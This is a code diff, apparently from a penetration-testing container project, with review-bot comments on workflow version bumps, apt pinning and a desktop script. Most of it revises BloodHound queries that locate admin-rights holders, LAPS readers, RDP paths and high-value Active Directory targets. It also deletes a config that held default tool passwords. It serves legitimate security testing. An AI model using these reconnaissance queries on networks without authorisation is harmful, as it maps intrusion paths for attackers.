diff --git a/.github/workflows/entrypoint_nightly.yml b/.github/workflows/entrypoint_nightly.yml
index 6fdcaa628..1ed0912ac 100644
--- a/.github/workflows/entrypoint_nightly.yml
+++ b/.github/workflows/entrypoint_nightly.yml
@@ -163,7 +163,7 @@ jobs:
 image: [ "${{ needs.init.outputs.IMAGE_TAG }}" ]
 steps:
 - name: Login to Dockerhub
- uses: docker/login-action@v2
+ uses: docker/login-action@v3
 with:
 username: ${{ secrets.DOCKER_USERNAME }}
 password: ${{ secrets.DOCKER_PASSWORD }}
diff --git a/.github/workflows/entrypoint_preprod_ad.yml b/.github/workflows/entrypoint_preprod_ad.yml
index c2cee5cef..079dd0b01 100644
--- a/.github/workflows/entrypoint_preprod_ad.yml
+++ b/.github/workflows/entrypoint_preprod_ad.yml
@@ -123,7 +123,7 @@ jobs:
 steps:
 - name: Login to Dockerhub
 if: success()
- uses: docker/login-action@v2
+ uses: docker/login-action@v3
 with:
 username: ${{ secrets.DOCKER_USERNAME }}
 password: ${{ secrets.DOCKER_PASSWORD }}
diff --git a/.github/workflows/entrypoint_preprod_base.yml b/.github/workflows/entrypoint_preprod_base.yml
index 28e0121bc..c752ac137 100644
--- a/.github/workflows/entrypoint_preprod_base.yml
+++ b/.github/workflows/entrypoint_preprod_base.yml
@@ -131,7 +131,7 @@ jobs:
 steps:
 - name: Login to Dockerhub
 if: success()
- uses: docker/login-action@v2
+ uses: docker/login-action@v3
 with:
 username: ${{ secrets.DOCKER_USERNAME }}
 password: ${{ secrets.DOCKER_PASSWORD }}
diff --git a/.github/workflows/entrypoint_preprod_full.yml b/.github/workflows/entrypoint_preprod_full.yml
index 9e10ed9b3..b9c7dfed3 100644
--- a/.github/workflows/entrypoint_preprod_full.yml
+++ b/.github/workflows/entrypoint_preprod_full.yml
@@ -123,7 +123,7 @@ jobs:
 steps:
 - name: Login to Dockerhub
 if: success()
- uses: docker/login-action@v2
+ uses: docker/login-action@v3
 with:
 username: ${{ secrets.DOCKER_USERNAME }}
 password: ${{ secrets.DOCKER_PASSWORD }}
diff --git a/.github/workflows/entrypoint_preprod_light.yml b/.github/workflows/entrypoint_preprod_light.yml
index 3b3b85310..7a2fa5160 100644
--- a/.github/workflows/entrypoint_preprod_light.yml
+++ b/.github/workflows/entrypoint_preprod_light.yml
@@ -123,7 +123,7 @@ jobs:
 steps:
 - name: Login to Dockerhub
 if: success()
- uses: docker/login-action@v2
+ uses: docker/login-action@v3
 with:
 username: ${{ secrets.DOCKER_USERNAME }}
 password: ${{ secrets.DOCKER_PASSWORD }}
diff --git a/.github/workflows/entrypoint_preprod_osint.yml b/.github/workflows/entrypoint_preprod_osint.yml
index dfabbe932..fbaa4b52b 100644
--- a/.github/workflows/entrypoint_preprod_osint.yml
+++ b/.github/workflows/entrypoint_preprod_osint.yml
@@ -123,7 +123,7 @@ jobs:
 steps:
 - name: Login to Dockerhub
 if: success()
- uses: docker/login-action@v2
+ uses: docker/login-action@v3
 with:
 username: ${{ secrets.DOCKER_USERNAME }}
 password: ${{ secrets.DOCKER_PASSWORD }}
diff --git a/.github/workflows/entrypoint_preprod_web.yml b/.github/workflows/entrypoint_preprod_web.yml
index 54afc6aa2..838c46466 100644
--- a/.github/workflows/entrypoint_preprod_web.yml
+++ b/.github/workflows/entrypoint_preprod_web.yml
@@ -123,7 +123,7 @@ jobs:
 steps:
 - name: Login to Dockerhub
 if: success()
- uses: docker/login-action@v2
+ uses: docker/login-action@v3
 with:
 username: ${{ secrets.DOCKER_USERNAME }}
 password: ${{ secrets.DOCKER_PASSWORD }}
diff --git a/.github/workflows/sub_build_belt.yml b/.github/workflows/sub_build_belt.yml
index f9383cf7d..f55cbdb0a 100644
--- a/.github/workflows/sub_build_belt.yml
+++ b/.github/workflows/sub_build_belt.yml
@@ -142,7 +142,7 @@ jobs:
 timeout-minutes: 360
 steps:
 - name: Login to Dockerhub
- uses: docker/login-action@v2
+ uses: docker/login-action@v3
 with:
 username: ${{ secrets.DOCKER_USERNAME }}
 password: ${{ secrets.DOCKER_PASSWORD }}
diff --git a/.github/workflows/sub_release_manifest.yml b/.github/workflows/sub_release_manifest.yml
index 546cd513a..742e2ec56 100644
--- a/.github/workflows/sub_release_manifest.yml
+++ b/.github/workflows/sub_release_manifest.yml
@@ -24,7 +24,7 @@ jobs:
 runs-on: self-hosted
 steps:
 - name: Login to Dockerhub
- uses: docker/login-action@v2
+ uses: docker/login-action@v3
 with:
 username: ${{ secrets.DOCKER_USERNAME }}
 password: ${{ secrets.DOCKER_PASSWORD }}
diff --git a/sources/assets/apt/preferences.d/default-stable b/sources/assets/apt/preferences.d/default-stable
new file mode 100644
index 000000000..7eb62645c
--- /dev/null
+++ b/sources/assets/apt/preferences.d/default-stable
@@ -0,0 +1,19 @@
+Package: *
+Pin: release a=stable-security
+Pin-Priority: 700
+
+Package: *
+Pin: release a=stable-updates
+Pin-Priority: 700
+
+Package: *
+Pin: release a=stable
+Pin-Priority: 700
+
+Package: *
+Pin: release a=testing
+Pin-Priority: 650
+
+Package: *
+Pin: release a=unstable
+Pin-Priority: 200
diff --git a/sources/assets/apt/sources.list.d/sid-debian.sources b/sources/assets/apt/sources.list.d/sid-debian.sources
new file mode 100644
index 000000000..cd432e648
--- /dev/null
+++ b/sources/assets/apt/sources.list.d/sid-debian.sources
@@ -0,0 +1,5 @@
+Types: deb
+URIs: http://deb.debian.org/debian
+Suites: sid
+Components: main non-free non-free-firmware contrib
+Signed-By: /usr/share/keyrings/debian-archive-keyring.gpg
\ No newline at end of file
diff --git a/sources/assets/bloodhound/customqueries.json b/sources/assets/bloodhound/customqueries.json
index d9f855cc0..59ed67e8e 100644
--- a/sources/assets/bloodhound/customqueries.json
+++ b/sources/assets/bloodhound/customqueries.json
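Review bot: The new pin file carries no `Explanation:` fields, so nothing in it says why the stable suites sit at 700, testing at 650 and unstable at 200, nor that 200 (below apt's 500 default) is what keeps a sid version from being chosen over a stable one unless it is requested explicitly. apt_preferences allows an `Explanation:` line at the top of each stanza; I would add e.g. `Explanation: sid is a fallback for packages absent from stable; never preferred over stable/testing` to the unstable stanza and a shorter one to the 650 testing stanza. Checking `apt-cache policy` once the image is rebuilt would confirm the ranking actually lands as intended, since testing is pinned here without a visible testing source in this diff.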
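Review bot: `URIs: http://deb.debian.org/debian` fetches the unstable index over plain HTTP; package integrity still rests on the `Signed-By` keyring, but the index and the package names being pulled are visible on the path and only `Valid-Until` bounds how stale a replayed index can be. The mirror serves HTTPS, so `URIs: https://deb.debian.org/debian` is a one-word change provided ca-certificates is already installed at the point this source is read (cannot tell from here). The file also ends without a trailing newline (`\ No newline at end of file`), harmless for deb822 but worth fixing for consistency.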
@@ -33,19 +33,27 @@ }] }, { - "name": "Find objects containing names of some tier 0 software (SCCM, Veeam, ...)", + "name": "Find enabled objects containing names/descriptions of some tier 0 software (Azure, SCCM, Veeam, ...)", "category": "High Value Targets", "queryList": [{ "final": true, - "query": "MATCH (o) WHERE (o.samaccountname =~ '(?i).*(?:sccm|veeam|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*') RETURN o" + "query": "WITH '(?i).*(?:azure|sccm|mecm|veeam|acronis|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*' AS keyword MATCH (o {enabled: TRUE}) WHERE o.samaccountname =~ keyword OR o.description =~ keyword OR o.name =~ keyword RETURN o" }] }, { - "name": "(Warning: edits the DB) Mark objects containing names of some tier 0 software (SCCM, Veeam, ...) as HVT", + "name": "(Warning: edits the DB) Mark enabled objects containing names/descriptions of some tier 0 software (Azure, SCCM, Veeam, ...) as HVT", "category": "High Value Targets", "queryList": [{ "final": true, - "query": "MATCH (o) WHERE (o.samaccountname =~ '(?i).*(?:sccm|veeam|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*') SET o.highvalue=TRUE RETURN o" + "query": "WITH '(?i).*(?:azure|sccm|mecm|veeam|acronis|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*' AS keyword MATCH (o {enabled: TRUE}) WHERE o.samaccountname =~ keyword OR o.description =~ keyword OR o.name =~ keyword SET o.highvalue=TRUE RETURN o" + }] + }, + { + "name": "Find enabled computers containing SPNs with some tier 0 software (Azure, SCCM, Veeam, ...) as HVT", + "category": "High Value Targets", + "queryList": [{ + "final": true, + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE SIZE(c.serviceprincipalnames) > 0 UNWIND [s IN c.serviceprincipalnames WHERE s =~ '(?i).*(?:azure|sccm|mecm|veeam|acronis|boomgar|tivoli|altiris|varonis|vcenter|vsphere|esx).*'] AS spn WITH c, spn WHERE SIZE(spn) > 0 return c" }] }, { 
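Review bot: The added query named `Find enabled computers containing SPNs with some tier 0 software (...) as HVT` only returns `c` and never sets `highvalue`, so the `as HVT` suffix, copied from the marking query just above, misdescribes it; either drop the suffix or add `SET c.highvalue=TRUE` as the sibling does. The `UNWIND` produces one row per matching SPN, so a computer with several matching SPNs comes back repeatedly; `RETURN DISTINCT c` gives one row per computer, and the `WITH c, spn WHERE SIZE(spn) > 0` step filters nothing the list comprehension did not already filter. Lower-case `return c` also breaks with the upper-case Cypher keywords used elsewhere in the file.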
@@ -402,16 +410,24 @@ "category": "Admins", "queryList": [{ "final": true, - "query": "MATCH p=(c:Computer {enabled: TRUE})-[:HasSession]->(u:User {enabled: TRUE}) WITH c,u MATCH p=shortestPath((u)-[:AdminTo|MemberOf*1..]->(c)) RETURN p", + "query": "MATCH shortestPath((u:User {enabled: TRUE})-[:AdminTo|MemberOf*1..]->(c:Computer {enabled: TRUE})) MATCH p=(c)-[:HasSession]->(u) RETURN p", "allowCollapse": true }] }, { - "name": "Users with local admin rights", + "name": "Enabled users (not Domain/Enterprise Admins) with local admin rights", + "category": "Admins", + "queryList": [{ + "final": true, + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH p=shortestPath((u2:User {enabled: TRUE})-[:MemberOf|AdminTo*1..]->(c:Computer {enabled: TRUE})) WHERE NOT u2.objectid IN domainAdmins AND NOT u2.name STARTS WITH 'ANONYMOUS LOGON' AND NOT u2.name='' RETURN p" + }] + }, + { + "name": "Enabled users (not Domain/Enterprise Admins) with ReadLAPSPassword rights", "category": "Admins", "queryList": [{ "final": true, - "query": "MATCH p=(m:User {enabled: TRUE})-[:AdminTo]->(n:Computer {enabled: TRUE}) RETURN p" + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH shortestPath((u2:User {enabled: TRUE})-[:MemberOf|ReadLAPSPassword*1..]->(c:Computer {enabled: TRUE})) WHERE NOT u2.objectid IN domainAdmins AND NOT u2.name STARTS WITH 'ANONYMOUS LOGON' AND NOT u2.name='' RETURN u2" }] }, { @@ -439,7 +455,7 @@ }] }, { - "name": "Users with adminCount, not sensitive for delegation, not members of Protected Users", + "name": "Enabled users with adminCount, not sensitive for delegation, not members of Protected Users (3 hops)", "category": "Admins", "queryList": [{ "final": true, 
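Review bot: In the new ReadLAPSPassword query the final `RETURN u2` is not distinct while the `shortestPath` match yields one row per (user, computer) pair, so a user holding the right on many computers is listed once per computer; `RETURN DISTINCT u2` gives one row per user. The same duplicate-row shape appears in the Top Ten "most admins" queries of the hunk at 671/687, where a trailing `MATCH (m)<-[:AdminTo]-(o:User {enabled: TRUE})` binds `o` without using it and multiplies each computer by its admin count before `RETURN m`; `RETURN DISTINCT m` (or dropping that MATCH) keeps those results at ten rows.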
@@ -467,7 +483,7 @@ "category": "Groups", "queryList": [{ "final": true, - "query": "Match (n:Group) WHERE n.name CONTAINS 'ADMIN' RETURN n" + "query": "Match (g:Group) WHERE g.name CONTAINS 'ADMIN' RETURN g" }] }, { @@ -475,7 +491,7 @@ "category": "Groups", "queryList": [{ "final": true, - "query": "MATCH p=(m:Group)-[:ForceChangePassword]->(n:User) RETURN DISTINCT m[.]name, COUNT(m[.]name) ORDER BY COUNT(m[.]name) DESC" + "query": "MATCH p=(g:Group)-[:ForceChangePassword]->(u:User) RETURN DISTINCT g.name, COUNT(g.name) ORDER BY COUNT(g.name) DESC" }] }, { @@ -483,7 +499,7 @@ "category": "Groups", "queryList": [{ "final": true, - "query": "MATCH p=(n:User)-[:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p" + "query": "MATCH p=(u:User)-[:MemberOf*1..]->(g:Group {highvalue:TRUE}) RETURN p" }] }, { @@ -614,7 +630,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS 'XP' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS 'XP' RETURN c" }] }, { @@ -622,7 +638,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2000' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS '2000' RETURN c" }] }, { @@ -630,7 +646,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2003' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS '2003' RETURN c" }] }, { @@ -638,7 +654,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2008' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS '2008' RETURN c" }] }, { 
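Review bot: In the rewritten ForceChangePassword query the path variable `p` and the node `u` are bound but never used, and `DISTINCT` is redundant once `COUNT` aggregates, because the aggregation already groups rows by `g.name`; `MATCH (g:Group)-[:ForceChangePassword]->(:User) RETURN g.name, COUNT(g.name) AS n ORDER BY n DESC` states the intent with nothing unused. The hunk at 467/483 keeps `Match` in mixed case while every other query touched by this commit uses upper-case keywords.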
@@ -646,7 +662,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS 'VISTA' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS 'VISTA' RETURN c" }] }, { @@ -654,7 +670,7 @@ "category": "Outdated OS", "queryList": [{ "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '7' RETURN c" + "query": "MATCH (c:Computer {enabled: TRUE}) WHERE toUpper(c.operatingsystem) CONTAINS '7' RETURN c" }] }, { @@ -662,7 +678,7 @@ "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", + "query": "MATCH (n:User {enabled: TRUE})<-[r:HasSession]-(m:Computer {enabled: TRUE}) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", "allowCollapse": true }] }, 
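Review bot: `toUpper(c.operatingsystem) CONTAINS '7'` matches any operating-system string that contains the digit 7, not only Windows 7, so the added `{enabled: TRUE}` filter still leaves the query able to list unrelated systems whose name or edition happens to carry a 7; `CONTAINS 'WINDOWS 7'` (the value is already upper-cased) narrows it to what the category promises. The XP/2000/2003/2008/Vista siblings use equally short substrings but those collide far less.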
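Review bot: After `WITH n, COUNT(r) AS rel_count` the variable `m` goes out of scope, so the final `MATCH p=(m)-[r:HasSession]->(n)` in the first Top Ten query binds a fresh, unlabelled `m`; the `{enabled: TRUE}` constraint placed on the computer in the first MATCH therefore does not apply to the paths that are returned, unlike the neighbouring Top Ten queries which re-state `(m:Computer {enabled: TRUE})` in the final pattern. `MATCH p=(m:Computer {enabled: TRUE})-[:HasSession]->(n) RETURN p` makes the two halves agree.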
@@ -671,43 +687,43 @@ "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", + "query": "MATCH (n:User {enabled: TRUE})<-[r:HasSession]-(m:Computer {enabled: TRUE}) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH p=(m)-[:HasSession]->(n) RETURN p", "allowCollapse": true }] }, { - "name": "Top Ten Users with Most Local Admin Rights", + "name": "Top Ten Users (not Domain Admins or Entreprise Admins) with most local admin rights", "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p", + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH (n:User {enabled: TRUE})-[r:AdminTo]->(m:Computer {enabled: TRUE}) WHERE NOT n.objectid IN domainAdmins AND NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH p=(n)-[:AdminTo]->(m:Computer {enabled: TRUE}) RETURN p", "allowCollapse": true }] }, { - "name": "Top Ten Computers with Most Admins and their admins", + "name": "Top Ten Computers with most local admin rights (not Domain Admins or Entreprise Admins) and their admins", "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p", + 
"query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH (n:User {enabled: TRUE})-[r:AdminTo]->(m:Computer {enabled: TRUE}) WHERE NOT n.objectid IN domainAdmins AND NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH p=(m)<-[:AdminTo]-(n:User {enabled: TRUE}) RETURN p", "allowCollapse": true }] }, { - "name": "Top Ten Computers with Most Admins", + "name": "Top Ten Computers with most admins (not Domain Admins or Entreprise Admins)", "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN m", + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH (n:User {enabled: TRUE})-[r:AdminTo]->(m:Computer {enabled: TRUE}) WHERE NOT n.objectid IN domainAdmins AND NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH (m)<-[:AdminTo]-(o:User {enabled: TRUE}) RETURN m", "allowCollapse": true }] }, { - "name": "(Warning: edits the DB) Mark Top Ten Computers with Most Admins as HVT", + "name": "(Warning: edits the DB) Mark Top Ten Computers with most admins (not Domain Admins or Entreprise Admins) as HVT", "category": "Top Ten", "queryList": [{ "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) AS rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) SET m.highvalue = true RETURN m", + "query": "MATCH (u:User {enabled: TRUE})-[:MemberOf*1..]->(g:Group) WHERE g.objectid 
=~ '.*-(512|519|(?i)S-1-5-32-544)$' WITH COLLECT(u.objectid) AS domainAdmins MATCH (n:User {enabled: TRUE})-[r:AdminTo]->(m:Computer {enabled: TRUE}) WHERE NOT n.objectid IN domainAdmins AND NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, COUNT(r) AS rel_count ORDER BY rel_count DESC LIMIT 10 MATCH (m)<-[:AdminTo]-(o:User {enabled: TRUE}) SET m.highvalue = true RETURN m", "allowCollapse": true }] }, @@ -734,7 +750,7 @@ "category": "RDP", "queryList": [{ "final": true, - "query": "MATCH p=((g:Group)-[:CanRDP]->(c:Computer {enabled: TRUE})) WHERE g.objectid ENDS WITH '-513' RETURN p AS path UNION MATCH p2=((g2:Group)-[:MemberOf*1..]->(g3:Group)-[:CanRDP]->(c2:Computer {enabled: TRUE})) WHERE g2.objectid ENDS WITH '-513' RETURN p2 AS path" + "query": "MATCH p=shortestPath((g:Group)-[:CanRDP|MemberOf*1..]->(c:Computer {enabled: TRUE})) WHERE g.objectid ENDS WITH '-513' RETURN p" }] }, { 
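Review bot: The four renamed Top Ten queries spell `Entreprise Admins`; the group is `Enterprise Admins`, so each name should read `(not Domain Admins or Enterprise Admins)`. In the marking variant `SET m.highvalue = true` uses lower-case `true` where the other queries edited in this commit write `TRUE`, and the `domainAdmins` regex `'.*-(512|519|(?i)S-1-5-32-544)$'` is now copied verbatim into five queries, which will drift the next time the exclusion list changes.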
@@ -742,16 +758,16 @@ "category": "RDP", "queryList": [{ "final": true, - "query": "MATCH p=((g:Group)-[:CanRDP]->(c:Computer {enabled: TRUE})) WHERE g.objectid ENDS WITH '-513' AND c.operatingsystem =~ '(?i).*Server.*' RETURN p AS path UNION MATCH p2=((g2:Group)-[:MemberOf*1..]->(g3:Group)-[:CanRDP]->(c2:Computer {enabled: TRUE})) WHERE g2.objectid ENDS WITH '-513' AND c2.operatingsystem =~ '(?i).*Server.*' RETURN p2 AS path", + "query": "MATCH p=shortestPath((g:Group)-[:CanRDP|MemberOf*1..]->(c:Computer {enabled: TRUE})) WHERE g.objectid ENDS WITH '-513' AND c.operatingsystem =~ '(?i).*Server.*' RETURN p", "allowCollapse": true }] }, { - "name": "Find enabled machines Authenticated Users can RDP to", + "name": "Find enabled computers Authenticated Users can RDP to", "category": "RDP", "queryList": [{ "final": true, - "query": "MATCH p=((g:Group)-[:CanRDP]->(c:Computer {enabled: TRUE})) WHERE g.objectid =~ '(?i).*S-1-5-11$' RETURN p AS path UNION MATCH p2=((g2:Group)-[:MemberOf*1..]->(g3:Group)-[:CanRDP]->(c2:Computer {enabled: TRUE})) WHERE g2.objectid =~ '(?i).*S-1-5-11$' RETURN p2 AS path", + "query": "MATCH p=shortestPath((g:Group)-[:CanRDP|MemberOf*1..]->(c:Computer {enabled: TRUE})) WHERE g.objectid =~ '(?i).*S-1-5-11$' RETURN p", "allowCollapse": true }] }, @@ -760,7 +776,7 @@ "category": "RDP", "queryList": [{ "final": true, - "query": "MATCH p=((g:Group)-[:CanRDP]->(c:Computer {enabled: TRUE})) WHERE g.objectid =~ '(?i).*S-1-5-11$' AND c.operatingsystem =~ '(?i).*Server.*' RETURN p AS path UNION MATCH p2=((g2:Group)-[:MemberOf*1..]->(g3:Group)-[:CanRDP]->(c2:Computer {enabled: TRUE})) WHERE g2.objectid =~ '(?i).*S-1-5-11$' AND c2.operatingsystem =~ '(?i).*Server.*' RETURN p2 AS path", + "query": "MATCH p=shortestPath((g:Group)-[:CanRDP|MemberOf*1..]->(c:Computer {enabled: TRUE})) WHERE g.objectid =~ '(?i).*S-1-5-11$' AND c.operatingsystem =~ '(?i).*Server.*' RETURN p", "allowCollapse": true }] }, 
@@ -769,7 +785,7 @@
 "category": "RDP",
 "queryList": [{
 "final": true,
- "query": "MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p"
+ "query": "MATCH p=(g:Group)-[:CanRDP]->(c:Computer) RETURN p"
 }]
 },
 {
@@ -785,7 +801,7 @@
 "category": "Azure",
 "queryList": [{
 "final": true,
- "query": "MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p"
+ "query": "MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p"
 }]
 },
 {
@@ -993,7 +1009,7 @@
 }]
 },
 {
- "name": "Find Unsecured Certificate Templates - Domain Escalation (ESC9)",
+ "name": "Find insecure Certificate Templates - Domain Escalation (ESC9)",
 "category": "AD CS Domain Escalation",
 "queryList": [
 {
@@ -1003,7 +1019,7 @@
 ]
 },
 {
- "name": "Find Unsecured Certificate Templates - PKI (ESC9)",
+ "name": "Find insecure Certificate Templates - PKI (ESC9)",
 "category": "AD CS Domain Escalation",
 "queryList": [
 {
diff --git a/sources/assets/crackmapexec/cme.conf b/sources/assets/crackmapexec/cme.conf
deleted file mode 100644
index 521d420c9..000000000
--- a/sources/assets/crackmapexec/cme.conf
+++ /dev/null
@@ -1,25 +0,0 @@
-[CME]
-workspace = default
-last_used_db = smb
-pwn3d_label = admin
-audit_mode =
-log_mode = False
-ignore_opsec = True
-
-[BloodHound]
-bh_enabled = False
-bh_uri = 127.0.0.1
-bh_port = 7687
-bh_user = neo4j
-bh_pass = exegol4thewin
-
-[Empire]
-api_host = 127.0.0.1
-api_port = 1337
-username = empireadmin
-password = exegol4thewin
-
-[Metasploit]
-rpc_host = 127.0.0.1
-rpc_port = 55552
-password = abc123
diff --git a/sources/assets/desktop/bin/desktop-start b/sources/assets/desktop/bin/desktop-start
index e0e7f99c3..866a7d59e 100644
--- a/sources/assets/desktop/bin/desktop-start
+++ b/sources/assets/desktop/bin/desktop-start @@ -10,7 +10,7 @@ find_available_display() { readarray -t x11_sockets < <(ss -x | grep X11| cut -d 'X' -f3 | cut -d ' ' -f 1 | sort -u) fi - local max_num=0 + local max_num=1 # Find the maximum number for num in "${x11_sockets[@]}"; do @@ -19,8 +19,8 @@ find_available_display() { fi done - # Search number from 1 to max_num+1 to find the first available DISPLAY id - for (( i = 1; i <= max_num + 1; i++ )); do + # Search number from 2 to max_num+1 to find the first available DISPLAY id (DISPLAY :1 cannot be used in some setup, starting from 2) + for (( i = 2; i <= max_num + 1; i++ )); do found=0 for num in "${x11_sockets[@]}"; do if (( num == i )); then @@ -42,6 +42,12 @@ host=${EXEGOL_DESKTOP_HOST:-"$HOSTNAME"} port=${EXEGOL_DESKTOP_PORT:-"6336"} username=${EXEGOL_USERNAME:-"root"} +# Clear X11 env from host sharing (if any) +unset XDG_RUNTIME_DIR +unset XDG_SESSION_TYPE +unset DISPLAY +unset WAYLAND_DISPLAY + echo "Starting Exegol desktop with $mode" display_id=$(find_available_display) @@ -67,7 +73,7 @@ case "$mode" in http) random_port=$(python3 -c 'import socket; s=socket.socket(); s.bind(("", 0)); print(s.getsockname()[1]); s.close()') vncserver -localhost "yes" -rfbport "$random_port" -geometry "1920x1080" -SecurityTypes "Plain" -PAMService "tigervnc" -PlainUsers "$username" ":$display_id" && \ - websockify -D --web /usr/share/novnc/ "$host:$port" "localhost:$random_port" + websockify -D --web /usr/share/novnc/ "$host:$port" "127.0.0.1:$random_port" ;; esac diff --git a/sources/assets/exegol/load_supported_setups.sh b/sources/assets/exegol/load_supported_setups.sh index f007cac1f..ef2ad680c 100755 --- a/sources/assets/exegol/load_supported_setups.sh +++ b/sources/assets/exegol/load_supported_setups.sh 
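Review bot: The new `unset` block clears DISPLAY, WAYLAND_DISPLAY and the two XDG variables but not `XAUTHORITY`, which usually travels with DISPLAY when a host X session is shared into the container; if it is forwarded, the Xvnc server started further down and any xauth call would likely read and write the host's cookie file rather than the container's own. I would add `unset XAUTHORITY` to the block, and check whether `DBUS_SESSION_BUS_ADDRESS` arrives the same way (cannot tell from here). The comment `# Clear X11 env from host sharing (if any)` could name that concern so the list is not trimmed later.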
